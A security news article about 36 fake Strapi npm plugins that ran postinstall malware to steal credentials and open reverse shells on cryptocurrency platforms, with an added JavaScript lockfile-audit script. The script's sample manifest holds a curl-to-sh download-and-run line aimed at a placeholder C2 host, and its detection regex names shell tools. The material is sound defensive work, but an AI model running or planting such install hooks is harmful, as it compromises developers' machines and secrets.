PROBABLYPWNED
Malware | April 7, 2026 | 4 min read

36 Fake Strapi Plugins Deploy Redis RCE and Credential Stealers

Coordinated npm supply chain attack deploys 36 malicious packages masquerading as Strapi CMS plugins. Attackers target cryptocurrency platforms with Redis exploitation, credential harvesting, and persistent backdoors.

James Rivera

Security researchers have uncovered 36 malicious packages in the npm registry disguised as Strapi CMS plugins, part of a coordinated supply chain campaign targeting cryptocurrency platforms. The packages deployed eight distinct malware variants capable of Redis exploitation, credential harvesting, and persistent reverse shell access.

Unlike typical npm spam campaigns that recycle identical payloads, this operation deployed progressively sophisticated malware, suggesting active development and likely targeting specific organizations rather than opportunistic mass infection.

Campaign Mechanics

All 36 packages follow the naming convention "strapi-plugin-" followed by legitimate-sounding terms like "cron," "database," "server," "health," and "api." Four sock puppet accounts distributed the packages over a 13-hour window: "umarbek1233," "kekylf12," "tikeqemif26," and "umar_bektembiev1."

The malicious code executes through npm's postinstall hook, meaning it runs automatically during npm install without requiring any additional action from developers. This is particularly dangerous in CI/CD pipelines and containerized environments where packages are installed with elevated privileges.

Version spoofing added credibility—all packages used version 3.6.8 to appear mature and established rather than newly published.

Payload Capabilities

The eight malware variants demonstrate a methodical escalation of capabilities:

Redis exploitation - Injecting crontab entries to download and execute shell scripts, plus writing PHP web shells and Node.js reverse shells to Strapi's public uploads directory.

Environment reconnaissance - Scanning for system variables, PostgreSQL connection strings, and Strapi configuration files.

Credential harvesting - Dumping environment variables, extracting Redis databases via INFO/DBSIZE/KEYS commands, and collecting Docker and Kubernetes secrets.

PostgreSQL exploitation - Direct database connections using hardcoded credentials, querying Strapi-specific tables for sensitive data. The queries specifically target cryptocurrency-related patterns: wallet, transaction, deposit, withdraw, hot, cold, balance.

Persistent implants - Maintaining reverse shell access to a hardcoded hostname "prod-strapi," suggesting specific targeting rather than opportunistic attacks.

Cryptocurrency Focus

The targeting patterns strongly indicate this campaign aimed at cryptocurrency platforms running Strapi as their content management backend. The hardcoded database credentials, Guardarian API targeting, and cryptocurrency wallet enumeration reveal the attackers' objectives.

This aligns with the broader trend of supply chain attacks targeting crypto infrastructure. The low-friction nature of npm package installation combined with the high-value targets in cryptocurrency makes this attack vector increasingly attractive to financially motivated threat actors.

Detection and Response

Organizations using Strapi should audit their package.json and package-lock.json files for any packages matching the naming patterns identified in this campaign. The full list of malicious package names includes variations with "nordica," "guardarian," "finseven," and "hextest" prefixes alongside generic plugin names.

Key indicators:

  • Packages with missing metadata (no description, repository, or homepage)
  • Version 3.6.8 with recent publish dates
  • Postinstall scripts executing network operations or spawning shells

For organizations that may have installed these packages, assume compromise. Rotate all credentials accessible from the affected systems, review Redis and PostgreSQL logs for unauthorized queries, and scan for persistent backdoors in web-accessible directories.
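The audit described above, written out as an added example (not code from the article, Strapi or npm): it walks a package-lock.json `packages` map, reads each installed manifest, and flags any package that trips two or more of the listed indicators. The lockfile, manifests and C2 URL are constructed placeholders so the script runs offline; replace the sample loaders with `fs.readFileSync` on the real files.

```javascript
// Heuristic audit for the indicators listed above: campaign-style name,
// version 3.6.8, missing metadata, postinstall that reaches out or spawns a shell.
const SUSPECT_NAME = /^strapi-plugin-/;
const CAMPAIGN_TERMS = /(nordica|guardarian|finseven|hextest|cron|database|server|health|api)/;
const SUSPECT_VERSION = "3.6.8";
const NET_OR_SHELL = /\b(curl|wget|nc|bash|sh)\b|https?:\/\/|child_process/;

// Score one package manifest (the contents of node_modules/<name>/package.json).
function auditManifest(m) {
  const hits = [];
  const name = m.name || "";
  if (SUSPECT_NAME.test(name) && CAMPAIGN_TERMS.test(name)) hits.push("name matches campaign pattern");
  if (m.version === SUSPECT_VERSION) hits.push("version 3.6.8");
  if (!m.description || !m.repository || !m.homepage) hits.push("missing description/repository/homepage");
  const post = m.scripts && m.scripts.postinstall;
  if (post && NET_OR_SHELL.test(post)) hits.push("postinstall runs network/shell: " + post);
  return hits;
}

// Walk a lockfile v2/v3 "packages" map and audit every installed package.
// loadManifest(name) returns the installed manifest, or null if it cannot be read.
function auditLockfile(lock, loadManifest) {
  const report = {};
  for (const [key, entry] of Object.entries(lock.packages || {})) {
    if (key === "") continue; // the root project entry
    const name = key.slice(key.lastIndexOf("node_modules/") + "node_modules/".length);
    const manifest = loadManifest(name) || { name, version: entry.version };
    const hits = auditManifest(manifest);
    if (hits.length >= 2) report[name] = hits; // two or more indicators: flag it
  }
  return report;
}

// Constructed sample data (not real packages): one benign dependency and one
// that matches the campaign's indicators, with a placeholder C2 hostname.
const SAMPLE_LOCK = { packages: {
  "": { name: "my-strapi-app" },
  "node_modules/harmless-util": { version: "1.2.0" },
  "node_modules/strapi-plugin-cron": { version: "3.6.8" },
} };
const SAMPLE_MANIFESTS = {
  "harmless-util": { name: "harmless-util", version: "1.2.0", description: "string helpers",
    repository: "git+https://example.invalid/harmless-util.git", homepage: "https://example.invalid" },
  "strapi-plugin-cron": { name: "strapi-plugin-cron", version: "3.6.8",
    scripts: { postinstall: "curl -s http://PLACEHOLDER-C2.invalid/x.sh | sh" } },
};

function runSample() { return auditLockfile(SAMPLE_LOCK, n => SAMPLE_MANIFESTS[n] || null); }
console.log(JSON.stringify(runSample(), null, 2));
```

Run `npm ci --ignore-scripts` before inspecting a suspect tree so no postinstall hook executes while the manifests are being read.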

Supply Chain Lessons

This campaign reinforces several supply chain security practices. Committing package-lock.json or yarn.lock pins dependency versions, so a fresh install cannot silently pull in a newer package version. Security scanning tools like Socket, Snyk, or npm audit should be integrated into CI/CD pipelines.

The ongoing wave of supply chain attacks demonstrates that package repositories remain a soft target. Attackers invest relatively little effort to reach a potentially large victim pool. The postinstall hook, in particular, represents a fundamental design flaw in npm's security model—arbitrary code execution during installation should require explicit opt-in rather than being the default behavior.

For developers evaluating new packages, verify package authorship, check publication history, and be suspicious of packages with minimal documentation or recent account creation. The 13-hour distribution window in this campaign would have been detectable by monitoring for bulk package publications from new accounts.

Strapi has not indicated whether the legitimate ecosystem was specifically targeted or if the attackers simply recognized Strapi's popularity among cryptocurrency platforms. Either way, the CMS's large install base made it an attractive impersonation target.
